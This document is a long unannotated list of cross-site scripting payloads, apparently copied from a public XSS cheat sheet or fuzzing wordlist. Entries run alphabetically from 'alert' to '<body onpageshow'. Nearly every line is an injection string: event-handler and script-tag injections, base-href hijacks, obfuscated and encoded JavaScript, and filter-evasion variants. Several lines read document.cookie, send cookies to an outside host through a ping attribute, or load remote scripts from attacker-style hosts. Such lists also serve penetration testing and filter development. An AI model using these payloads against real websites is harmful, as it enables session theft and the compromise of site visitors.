- alert(String.fromCharCode(88,83,83));’))”>
- alert(String.fromCharCode(88,83,83));’))”>
- ‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;
- alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))// —
- ‘;alert(String.fromCharCode(88,83,83))//\’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//--></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
- <”’;alert(String.fromCharCode(88,83,83))//\’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))// →</SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
- ‘;;alert(String.fromCharCode(88,83,83))//\’;;alert(String.fromCharCode(88,83,83))//”;;alert(String.fromCharCode(88,83,83))//\”;;alert(String.fromCharCode(88,83,83))// →;<;/SCRIPT>;”;>;’;>;<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>;
- ‘;alert(String.fromCharCode(88,83,83))//’;alert(String. fromCharCode(88,83,83))//”;alert(String.fromCharCode (88,83,83))//”;alert(String.fromCharCode(88,83,83))// →</SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
- ‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”; alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))// — /SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
- ‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))// →</SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
- ‘;alert(String.fromCharCode(88,83,83))//\’; alert(String.fromCharCode(88,83,83))//”; alert(String.fromCharCode(88,83,83))//\”; alert(String.fromCharCode(88,83,83))// →</SCRIPT>”>’><SCRIPT> alert(String.fromCharCode(88,83,83))</SCRIPT>
- ‘;alert(String.fromCharCode(88,83,83))//\’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//></SCRIPT> — !><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
- ‘;alert(String.fromCharCode(88,83,83))//\’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//></SCRIPT>! — <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
- ‘;alert(String.fromCharCode(88,83,83))//\’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//></SCRIPT>! — <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
- ‘;alert(String.fromCharCode(88,83,83))//\’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))// →</SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
- ‘;alert(String.fromCharCode(88,83,83))//\’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))// →</SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search
- ;alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//V></SCRIPT>>><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
- alert(String.fromCodePoint(88,83,83))
- alert(String(/xss/).substr(1,3))
- alert(this[“\x64\x6f\x63\x75\x6d\x65\x6e\x74” ][“cook” + ([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]])
- alert(this[“\x64\x6f\x63\x75\x6d\x65\x6e\x74”][“cook” + ([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]])
- alert(unescape(escape(/????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????/).replace(/u.{8}/g,[])))
- alert(unescape(escape(/??/).replace(/u.{8}/g,[])))
- alert(win == window); // false
- alert(1)
- ‘;alert(/xss/)///
- );alert(Xss);//
- ��);alert(��Xss��);//
- ‘|alert(‘XSS’)|’
- ‘); alert(‘XSS
- “;alert(‘XSS’);//
- \”;;alert(‘;XSS’;);//
- \”;alert(‘XSS’);//
- \\”;alert(‘XSS’);//
- : ({[alert`xss`]:1})
- ({[alert`xss`]:1})
- ‘;alert(/xss/)///’;alert(1)//”;alert(2)///”;alert(3)// →</SCRIPT>”>’><SCRIPT>alert(/xss/)</SCRIPT>=&{}”);}alert(6);functions+xss(){//
- );alert(xss-by-shawar);//
- alert(/xss/.source)
- ‘); alert(‘xss’); var x=’
- \\’); alert(\’xss\’);var x=\’
- ��); alert(��XSS Vulnerability��); void(��0 ‘ “/>”><img src=x onerror=prompt(/XSS/)>
- /ale/.source%2B/rt/.source%2Blocation.hash.substr(1)>#(1)
- /ale/.source + /rt/.source
- alt=’”name=’onerror=alert()//’
- alt= onclick=alert(1)
- alt=””onclick=”alert(1)”
- alt=``onload=alert(1)
- al\u0065rt(1)
- al\u0065rt(87)
- always>%20<param%20name=url%20value=https://l0.cm/xss.swf>
- always%3E%20%3Cparam%20name=url%20value=https://l0.cm/xss.swf%3E
- <a name=javascript:alert(1) href=//target.com/?xss=<svg/onload=location=name//>CLICK</a>
- angular.bind(self, alert, 9)()
- angular.element.apply(alert(9))
- <animate attributeName=”onunload” to=”alert(1)”/>
- <animate attributeName=”xlink:href” begin=”0" from=”javascript:alert(1)” to=”&” />
- /><animate attributeName=”xlink:href” values=”;javascript:alert(1)”
- <animation xlink:href=”data:text/xml,%3Csvg xmlns=’http://www.w3.org/2000/svg' onload=’alert(1)’%3E%3C/svg%3E”/>
- <animation xlink:href=”javascript:alert(1)”/>
- <anytag onclick=alert(16)>M
- <anytag onmouseover=alert(15)>M
- anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
- anythinglr00</script><script>alert(document.domain)</script>uxldz
- <anything onbeforescriptexecute=confirm(1)>
- <anything onmouseover=javascript:confirm(1)>
- <a onclick=alert(18)>M
- <a=” onclick=”alert(1)//”>clickme</a>
- <a onclick=”i=createElement(‘iframe’);i.src=’javascript:alert(/xss/)’;x=parentNode;x.appendChild(i);” href=”#”>Test</a>
- <a oncut=alert(1)>
- <a/oncut=alert(1)>
- <a onhelp=’eval(href+”confirm(1)”)’contenteditable=’true’href=’ javascript:’>click</a>
- <a onkeydown=alert(document.cookie)>xxs link</a>
- <a onkeypress=”alert(document.cookie)”>xxs link</a>
- <a onkeypress=alert(document.cookie)>xxs link</a>
- <a onkeyup=”alert(document.cookie)”>xxs link</a>
- [[a|onload=alert(1)]]
- <a onload=”alert(document.cookie)”>xxs link</a>
- <a onload=alert(document.cookie)>xxs link</a>
- </a onmousemove=”alert(1)”>
- <a/onmousemove=alert(1)//>renwax23
- <a onmouseover%0B=location=%27\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3 B\x63\x6F\x6E\x66\x69\x72\x6D\x26\x6C\x70\x61\x72\x3B\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x 6F\x6F\x6B\x69\x65\x26\x72\x70\x61\x72\x3B%27>CLICK
- <a onmouseover%0B=location=%27\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x63\x6F\x6E\x66\x69\x72\x6D\x26\x6C\x70\x61\x72\x3B\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x6F\x6F\x6B\x69\x65\x26\x72\x70\x61\x72\x3B%27>CLICK
- <a onmouseover%3D”alert(1)”>renwax23
- <a onmouseover=alert(17)>M
- <a onmouseover=”alert(document.cookie)”>xxs link</a>
- <a onmouseover=alert(document.cookie)>xxs link</a>
- <a onmouseover=”javascript:window.onerror=alert;throw 1>
- <a onmouseover=location=’javascript:al
 1rt(1)'>a<a>
- <a onmouseover=location=’javascript:alert(1)'>a<a>
- <a onmouseover=location=��javascript:alert(1)>click
- <a onmouseover=location=javascript:alert(1)>click
- <a onmouseover=location=zjavascript:alert(1)>click
- <a/onmouseover[\x0b]=location='\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x30\x29\x3B'>rhainfosec
- <a/onmouseover[\x0b]=location=’\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x30\x29\x3B’>
- <a/onmouseover[\x0b]=location=’\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6 C\x65\x72\x74\x28\x30\x29\x3B’>xss
- a. ping=`//pkav/?${escape(document.cookie)}`
- ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))// — ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
- '';! — "<XSS>=&{()}
- appendChild(createElement(‘script’)).src=’//HOST:PORT’},0)>
- appendChild(createElement(“script”)).src=”//HOST:PORT”},0)>
- <APPLET+CODE=””+CODEBASE="http://url/xss">
- <applet code=javascript:alert(‘sgl’)>
- <applet code=”javascript:confirm(document.cookie);”>
- <Applet code = “javascript: confirm (document.cookie);”>
- <applet code=”javascript:confirm(document.cookie);”> // Firefox Only
- <applet/object onerror=alert(‘XSS’)>
- <applet onerror=”alert(1)”></applet>
- <applet onerror applet onerror=”javascript:javascript:alert(1)”></applet onerror>
- <applet onError applet onError=”javascript:javascript:alert(1)”></applet onError>
- <applet onreadystatechange applet onreadystatechange=”javascript:javascript:alert(1)”></applet onreadystatechange>
- <applet onReadyStateChange applet onReadyStateChange=”javascript:javascript:alert(1)”></applet onReadyStateChange>
- &a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert('XSS');")"; eval(a+b+c+d);
- a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert('XSS');")"; eval(a+b+c+d);
- <a rel=”noreferrer” href=”//google.com”>click</a>
- <a rel=”noreferrer” href=”//xss.cx”>click</a>
- arg 1�Galert(1)
- Array.from([1],alert)
- Array.map([1],alert)
- Array.prototype[Symbol.hasInstance]=eval;”alert(1)” instanceof [];
- Array[Symbol.species].constructor(‘alert(1)’)();
- <article xmlns =”urn:img src=x onerror=xss()//” >renwax23
- a?<script>alert(‘Vulnerable’)</script>
- ascript:alert(‘XSS’);”>
- ?asfunction:getURL,javascript:alert(1)//”,
- ASP a = val1,val2
- ASP.NET a = val1,val2
- <a style=”behavior:url(#default#AnchorClick);” folder=”javascript:alert(1)”>click</a>
- <a style=”behavior:url(#default#AnchorClick);” folder=”javascript:javascript:alert(1)”>XXX</a>
- <a style=”-o-link:’javascript:alert(1)’;-o-link-source:current”>X</a>
- <a style=”-o-link:’javascript:javascript:alert(1)’;-o-link-source:current”>X
- <a style=”pointer-events:none;position:absolute;”><a style=”position:absolute;” onclick=”alert(1);”>XXX</a></a><a href=”javascript:alert(2)”>XXX</a>
- <a style=”pointer-events:none;position:absolute;”><a style=”position:absolute;” onclick=”javascript:alert(1);”>XXX</a></a><a href=”javascript:javascript:alert(1)”>XXX</a>
- </a style=””xx:expr/**/ession(document.appendChild(document.createElement(‘script’)).src=’http://h4k.in/i.js')">
- <a target=_blank href=”data:text/html,<script>confirm(opener.document.body.innerHTML)</script>”>clickme in Opera/FF</a>
- “‘> →<a/target=_blank href=//go.bmoine.fr/tab-nabbing>Polyglot XSS</a>
- <a target=”x” href=”xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{alert%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E
- <a target=”x” href=”xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{confirm%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E
- <a target=”x” href=”xssme?xss=<script>find(‘cookie’); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate(‘//script/text()’, doc, nsResolver, 0, null); alert(result.iterateNext().data.match(/cookie = ‘(.*?)’/)[1])</script>
- <a target=”x” href=”xssme?xss=<script>find(‘cookie’); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate(‘//script/text()’, doc, nsResolver, 0, null); confirm(result.iterateNext().data.match(/cookie = ‘(.*?)’/)[1])</script>
- <a target=”x” href=”xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open(‘GET’, ‘.’, true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = ‘(.*?)’/)[1]) };xhr.send();
- <a target=”x” href=”xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open(‘GET’, ‘.’, true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = ‘(.*?)’/)[1]) };xhr.send();
- <a target=”x” href=”xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe>
- atob.constructor(atob`YWxlcnQoMSk`)``
- atob.constructor(atob(/YWxlcnQoMSk/.source))()
- atob.constructor(unescape([…escape((??????????????????????????????????????????????????=?=>?).name)].filter((?,?)=>?%12<1|?%12>9).join([])))()
- atob(“YWxlcnQoMSk=”)
- atob`YWxlcnQoMSk` instanceof window
- [atob(‘ZGVmYXVsdFZpZXc=’)][8680439..toString(30)](1)
- {{a=toString().constructor.prototype;a.charAt=a.trim;$eval(‘a,alert(1),a’)}}
- {{ ‘a’[{toString:false,valueOf:[].join,length:1,0:’__proto__’}].charAt=[].join; $eval(‘x=alert(1)//’); }}
- {{‘a’[{toString:[].join,length:1,0:’__proto__’}].charAt=’’.valueOf;$eval(“x=’”+(y=’if(!window\\u002ex)alert(window\\u002ex=1)’)+eval(y)+”’”);}}
- .attr
- attributeName=xlink:href begin=0 from=javascript:alert(1) to=%26>
- \’-a\u{6c}e\u{72}t(1))%0a →
- <audio onerror=”javascript:alert(1)”><source>//INJECTX
- <AuDiO/**/oNLoaDStaRt=’(_=/**/confirm/**/(1))’/src><! — renwax23
- <audio src=1 href=1 onerror=”javascript:alert(1)”></audio>
- <audio src=1 onerror=alert(1)>
- <audio src=”data:audio/mp3,%FF%F3%84%C4%FF%F3%14% C4" oncanplay=”alert(1)”>
- <audio src onloadstart=alert(1)>
- <audio src onloadstart=alert(101)>
- <audio src=x onerror=confirm(“1”)>
- <audio src=x onerror=prompt(1);>
- <audio src=x onerror=prompt(1);>
- “ autofocus onfocus=alert(1) “
- “autofocus/onfocus=alert(1)//
- “autofocus/onfocus=alert(1)
- autofocusonfocus=alert(1)//
- ‘“/autofocus/onfocus=’alert(1)’x=
- “autofocus/onfocus=alert(78)//
- ‘ autofocus onkeyup=’javascript:alert(123)
- “ autofocus onkeyup=”javascript:alert(123)
- “autof<x>ocus o<x>nfocus=alert<x>(1)//
- <AutoStart>1</AutoStart>
- avascript:alert(document.cookie)
- <A?vg><A?cript/href=//aEa?L>
- <a[\x0B]
- <a xlink:href=”http://google.com">
- <a xmlns:xlink=”http://www.w3.org/1999/xlink" xlink:href=”javascript:alert(1)”><rect width=”1000" height=”1000" fill=”white”/></a>
- <a xmlns:xlink=��http://www.w3.org/1999/xlink�� xlink:href=��javascript:alert(9)��>
- ><a XSS-test href=jAvAsCrIpT:prompt(/Xss-By-Muhaddi/)>ClickMe
- ��><a XSS-test href=jAvAsCrIpT:prompt(/Xss-By-Muhaddi/)>ClickMe
- ><a XSS-test href=jAvAsCrIpT:prompt(/XSS-by-Shawar/)>ClickMe
- a{xxx:\65\78\70\72\65\73\73\69\6f\6e\28\69\66\28\21\77\69\6e\64\6f\77\2e\78\29\7b\61\6c\65\72\74\28\27\78\73\73\27\29\3b\77\69\6e\64\6f\77\2e\78\3d\31\3b\7d\29}
- a{xxx:expression(if(!window.x){alert(‘xss’);window.x=1;})}
- <a z=&x=& onmousemove=t=Object(window.name);
- <a z=&x=& onmousemove=t=Object(window.name);({$:#0=t,z:eval(String(#0#).replace(/@/g,))}).z//>
- b=`*/(1)}`;
- <b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover=alert(1)>
- <BackgroundColor>FFFFFF</BackgroundColor>
- background-repeat:no-repeat V><math><!V
- background:url(‘//brutelogic.com.br/webgun/img/youtube1.jpg’);
- background:url(//brutelogic.com.br/webgun/img/youtube1.jpg);background-repeat:no-repeat V><math><!V
- <b/alt=”1"onmouseover=InputBox+1
- <b/alt=”1"onmouseover=InputBox+1 language=vbs>test</b>
- <b/alt=”1"onmouseover=InputBox+1language=vbs>test</b>
- banner.swf?clickTAG=javascript:alert(1);//
- base64 alert(2) = data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+
- <base href=//0>
- <base href=data:/,0/><script src=alert(1)></script>
- <base href=data:/,alert(1)/><script src=”jquery.js”></script>
- <base href=”/\evil”>
- <base href=javascript:/0/><iframe src=,alert(1)></iframe>
- <base href=”javascript:\”> <a href=”//%00confirm(2);//”>XSS</a>
- <base href=”javascript:\”> <a href=”//%0a%0dconfirm(2);//”>XSS</a>
- <base href=”javascript:\”> <a href=”//%0aalert(/1/);//”>link</a>
- <base href=”javascript:\”> <a href=”//%0aconfirm(2);//”>XSS</a>
- <base href=”javascript:/”><a href=”**/alert(1)”><base href=”javascript:/”><a href=”**/alert(1)”>
- <base href=”javascript:\”> <a href=”//xss.cx/xss.js”>XSS</a>
- <base+href=”javascript:alert(1);//”>
- <BASE href=”javascript:alert(‘X8SS’);//”>
- <;BASE HREF=”;javascript:alert(‘;XSS’;);//”;>;
- <BASE HREF=”javascript:alert(‘XSS’);//”>
- <BASE HREF=”javascript:alert(‘XSS’);//”>
- <BASE HREF=”javascript:alert(XSS);//”>
- <BASE HREF=”javascript:confirm(‘XSS’);//”>
- <base HREF=”javascript:document.vulnerable=true;//”>
- <BASE HREF=”javascript:javascript:alert(1);//”>
- <base/href=jAvaScript:/>
- ?base=javascript:alert(0)”,
- <base target=”<script>alert(1)</script>”><a href=”javascript:name”>CLICK</a>
- ?baseurl=asfunction:getURL,javascript:alert(1)//”,
- <b class=”ng-include:’//evil’’”>
- %BCscript%BEalert(%A21%A2)%BC/script%BE
- %BCscript%BEalert(%A2XSS%A2)%BC/script%BE
- begin=”0s” dur=”0.1s” fill=”freeze”/>
- <BGSOUND id=XSS SRC=”javascript:alert(‘XSS’);”>
- <bgsound onPropertyChange bgsound onPropertyChange=”javascript:javascript:alert(1)”></bgsound onPropertyChange>
- <bgsound+src=”javascript:alert(1);”>
- <BGSOUND src=”javascript:alert(‘XjSS’);”>
- <;BGSOUND SRC=”;javascript:alert(‘;XSS’;);”;>;
- <BGSOUND SRC=”javascript:alert(‘XSS’);”>
- <BGSOUND SRC=”javascript:alert(‘XSS’);”
- <BGSOUND SRC=”javascript:alert(XSS);”>
- <BGSOUND SRC=”javascript:alert(‘XSS’);”>
- <BGSOUND SRC=”javascript:confirm(‘XSS’);”>
- <bgsound src=”javascript:document.vulnerable=true;”>
- <bgsound SRC=”javascript:document.vulnerable=true;”>
- <BGSOUND SRC=”javascript:javascript:alert(1);”>
- <blah style=”blah:expression(alert(1))” />
- <blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}
- [<blockquote cite=”]”>[“ onmouseover=”alert(‘RVRSH3LL_XSS’);” ]
- <b><noscript><a src=’x’ style=’x:\3c\2fnoscript\3e\3ciframe/onload\3d alert(1)\3e’>
- </body>
- <BoDy%0AOnpaGeshoW=%2bwindow.prompt(1)
- body.appendChild(createElement(‘script’)).src=’//DOMAIN’
- <BODY BACKGROUND=”javascript:alert(‘XeSS’)”>
- <;BODY BACKGROUND=”;javascript:alert(‘;XSS’;);”;>;
- <BODY BACKGROUND=”javascript:alert(‘XSS’);”>
- <BODY BACKGROUND=”javascript:alert(‘XSS’)”>
- <BODY BACKGROUND=”javascript:alert(XSS)”>
- <BODY BACKGROUND=javascript:alert(XSS)>
- <body background=javascript:alert(/xss/)></body>
- <BODY BACKGROUND=”javascript:confirm(‘XSS’)”>
- <body BACKGROUND=”javascript:document.vulnerable=true;”>
- <body background=javascript:’”><script>alert(navigator.userAgent)</script>></body>
- <body background=javascript:’”><script>alert(navigator.userAgent)</script>></body>
- <body background=javascript:’”><script>alert(XSS)</script>></body>
- body{background:url(JavAs cr ipt:alert(0))}
- body{background:url(“javascript:alert(‘xss’)”)}
- <body <body onload=;;;;;al:eval(‘al’+’ert(1)’);;>
- </BODY></HTML>
- <body id=XSS onscroll=eval(String[‘fromCharCode’](97,108,101,114,116,40,39,120,115,115,39,41,32))><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
- <body language=vbsonload=alert-1
- <body language=vbs onload=alert-1
- <body language=vbsonload=alert-1
- <body language=vbs onload=alert-1 // IE-8
- <body language=vbs onload=confirm-1
- <body language=vbs onload=window.location=’data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+’>
- “><body language=vbs onload=window.location=’http://xss.cx'>
- <body/onactivate=alert(1)>
- <body/onactivate=URL=name//
- <body onbeforeunload body onbeforeunload=”javascript:javascript:alert(1)”></body onbeforeunload>
- <body onBeforeUnload body onBeforeUnload=”javascript:javascript:alert(1)”></body onBeforeUnload>
- <body onblur body onblur=”javascript:javascript:alert(1)”></body onblur>
- <body onblur=x onload=popup=1;>
- <body onclick=”poc();”>
- <body onerror=popup=1;><svg/onfocus=import>
- <body onfocus=alert(1)>
- <body onfocus=alert(93)>
- <body onfocus body onfocus=”javascript:javascript:alert(1)”></body onfocus>
- <body onFocus body onFocus=”javascript:javascript:alert(1)”></body onFocus>
- <body onfocus=”location='javascrpt:alert(1)
- <body onfocus=”location='javascrpt:alert(1) >123
- <body onfocus=”location=’javascrpt:alert(1) >123
- <body onhashchange=alert(1)>
- <body/onhashchange=alert(1)><a href=#>clickit
- <body/onhashchange=alert(1)><a href=#>click me
- <body onhashchange=alert(1)><a href=#x>click this!#x
- <body onhashchange=alert(94)><a href=#x>click this!#x
- <body onhelp=alert(1)>press F1! (MSIE)
- <body onhelp=alert(98)>press F1! (MSIE)
- <body oninput=alert(document.domain)><input autofocus></br>
- <body oninput=javascript:alert(1)><input autofocus>
- <body onkeydown body onkeydown=”javascript:javascript:alert(1)”></body onkeydown>
- <body onkeyup body onkeyup=”javascript:javascript:alert(1)”></body onkeyup>
- <body onload=;a1={x:document};;;;;;;;;_=a1.x;_.write(1);;;;
- <body onload=a1={x:this.parent.document};a1.x.writeln(1);>
- <body onload=;a2={y:eval};a1={x:a2.y(‘al’+’ert’)};;;;;;;;;_=a1.x;_(1);;;;
- \”><BODY ONLOAD=alert(0x000123)>
- <body onload=;;;;;;;;;;;_=alert;_(1);;;;
- <body onload=alert(1)>
- <body onload=”$})}}}});alert(1);({0:{0:{0:function(){0({“>
- <body/onload=alert(25)>
- <body onload=alert(91)>
- <BODY ONLOAD=alert(‘hellox worldss’)>
- <BODY ONLOAD=alert(iXSSi)>
- <BODY ONLOAD=alert(‘XgSS’)>
- ><body/onload=alert(Xss)>
- ��><body/onload=alert(��Xss��)>
- <body onLoad=”alert(‘XSS’);”
- <body onLoad=”alert(‘XSS’);”
- <;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(“;XSS”;)>;
- <BODY onload!#$%&()*~+_.,:;?@[/|]^`=alert(“XSS”)>
- <BODY onload!#$%&()*~+_.,:;?@[/|\]^`=alert(“XSS”)>
- <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
- <BODY onload!#$%&()*~+-_.###:;?@[/|\]^`=alert(“XSS”)>
- “><BODY onload!#$%&()*~+_.,:;?@[/|]^`=alert(“XSS”)>
- “><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
- “;>;<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(“;XSS”;)>;
- <;BODY ONLOAD=alert(‘;XSS’;)>;
- <BODY ONLOAD=alert(‘XSS’)>
- <BODY ONLOAD=alert(“XSS”)>
- <BODY ONLOAD=alert(��XSS��)>
- <BODY ONLOAD=alert(XSS)>
- <BODY ONLOAD =alert(‘XSS’)>
- ><body/onload=alert(Xss-By-Muhaddi)>
- <body onload=alert(/XSS/.source)>
- “> <BODY ONLOAD=”a();”><SCRIPT>function a(){alert(‘X12SS’);}</SCRIPT><”
- “> <BODY ONLOAD=”a();”><SCRIPT>function a(){alert(‘XSS’);}</SCRIPT><”
- <body onload body onload=”javascript:javascript:alert(1)”></body onload>
- <body onLoad body onLoad=”javascript:javascript:alert(1)”></body onLoad>
- <BODY ONLOAD=confirm(‘XSS’)>
- <body onload=”document.vulnerable=true;”>
- <body onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;>
- <body ONLOAD=document.vulnerable=true;>
- <BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)>
- <BODY ONLOAD=javascript:alert(1)>
- <BODY ONLOAD=javascript:javascript:alert(1)>
- <body/onload=javascript:window.onerror=eval;throw'=alert\x281\x29';
- <body/onload=javascript:window.onerror=eval;throw’=alert\x281\x29';>
- <body/onload=location=name//
- <body/onload=location=write(top)//
- <body/onload=<! — >
alert(1)>
- <body/onload=<! — >
alert(1)>
- <body/onload=<! — >
confirm(1)>
- <body/onload=<! — >
confirm(1);prompt(/XSS/.source)>
- ><body/onload=<! — >
confirm(1);prompt(/XSS/.source)>
- “<body/onload=<! — >
confirm(1);prompt(/XSS/.source)>”
- “\”><body/onload=<! — >
confirm(1);prompt(/XSS/.source)>”,
- <body onload=popup=1;>
- <body onload=```${prompt``}`>
- <body onload=prompt(1);>
- <body/onload=self[/loca/.source%2b/tion/.source]=name//
- <body/onload=this[/loca/.source%2b/tion/.source]=name//
- <body/onload=URL=name//
- <body onload=”’use strict’;throw new class extends Function{}(‘alert(1)’)``”>
- <body onload=’vbs:Set x=CreateObject(“Msxml2.XMLHTTP”):x.open”GET”,”.”:x.send:MsgBox(x.responseText)’>
- <body onLoad=”while(true) alert(‘XSS’);”>
- <body onLoad=”while(true) alert(‘XSS’);”>
- <body/onload=window[/loca/.source%2b/tion/.source]=name//
- <body/����$/onload=x={doc:parent[��document��]};x.doc.writeln(1)
- <body onMouseEnter body onMouseEnter=”javascript:javascript:alert(1)”></body onMouseEnter>
- <body onMouseMove body onMouseMove=”javascript:javascript:alert(1)”></body onMouseMove>
- <body onMouseOver body onMouseOver=”javascript:javascript:alert(1)”></body onMouseOver>
- <body onorientationchange=alert(1)>
- <body onorientationchange=alert(orientation)>
- <body onpagehide body onpagehide=”javascript:javascript:alert(1)”></body onpagehide>
- <body onPageHide body onPageHide=”javascript:javascript:alert(1)”></body onPageHide>
- <body onpageshow=”alert(1)”>
- <body onpageshow=alert(1)>
- <body/onpageshow=alert(1)>
- <body onpageshow=alert(92)>
